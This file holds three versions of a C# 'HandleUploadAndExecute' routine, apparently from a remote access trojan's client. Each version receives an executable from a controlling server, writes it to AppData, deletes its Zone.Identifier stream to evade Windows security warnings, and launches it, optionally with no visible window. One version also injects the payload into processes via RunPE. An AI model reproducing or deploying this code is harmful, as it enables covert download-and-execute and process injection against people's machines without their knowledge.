public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client) { string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), command.FileName); try { if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z') { throw new Exception("No executable file"); } FileSplit destFile = new FileSplit(filePath); if (!destFile.AppendBlock(command.Block, command.CurrentBlock)) { new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute( client); return; } if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute { DeleteFile(filePath + ":Zone.Identifier"); ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = command.RunHidden; startInfo.FileName = filePath; Process.Start(startInfo); new Packets.ClientPackets.Status("Executed File!").Execute(client); } } catch (Exception ex) { DeleteFile(filePath); new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client); } }
public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client) { new Thread(new ThreadStart(() => { byte[] fileBytes = command.FileBytes; string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), command.FileName); try { if (fileBytes[0] != 'M' && fileBytes[1] != 'Z') { throw new Exception("no pe file"); } File.WriteAllBytes(tempFile, fileBytes); DeleteFile(tempFile + ":Zone.Identifier"); ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = command.RunHidden; startInfo.FileName = tempFile; Process.Start(startInfo); } catch { DeleteFile(tempFile); new Packets.ClientPackets.Status("Execution failed!").Execute(client); return; } new Packets.ClientPackets.Status("Executed File!").Execute(client); })).Start(); }
public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client) { string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), command.FileName); try { if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z') { throw new Exception("No executable file"); } MemorySplit destFile = new MemorySplit(filePath); if (!destFile.AppendBlock(command.Block, command.CurrentBlock)) { new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute( client); return; } if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute { if (command.Type == "drop") { if (!destFile.DropFile()) { new Packets.ClientPackets.Status(string.Format("Drop failed: {0}", destFile.LastError)).Execute( client); return; } DeleteFile(filePath + ":Zone.Identifier"); ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = command.RunHidden; startInfo.FileName = filePath; Process.Start(startInfo); new Packets.ClientPackets.Status("Executed File!").Execute(client); } else if (command.Type == "self") { byte[] dat = destFile.ToByteArray(); //File.WriteAllBytes("lol.exe", dat); if (dat == null) { new Packets.ClientPackets.Status("Payload was null!").Execute(client); return; } //Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib); //a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "self", "" } }); RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "self", "" }, client); } else if (command.Type == "cmd") { byte[] dat = destFile.ToByteArray(); if (dat == null) { new Packets.ClientPackets.Status("Payload was null!").Execute(client); return; } //Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib); //a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "sys", "cmd" } }); RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "sys", "cmd" }, client); } else { new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client); } } } catch (Exception ex) { DeleteFile(filePath); new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.ToString())).Execute(client); //MessageBox.Show(ex.ToString()); } }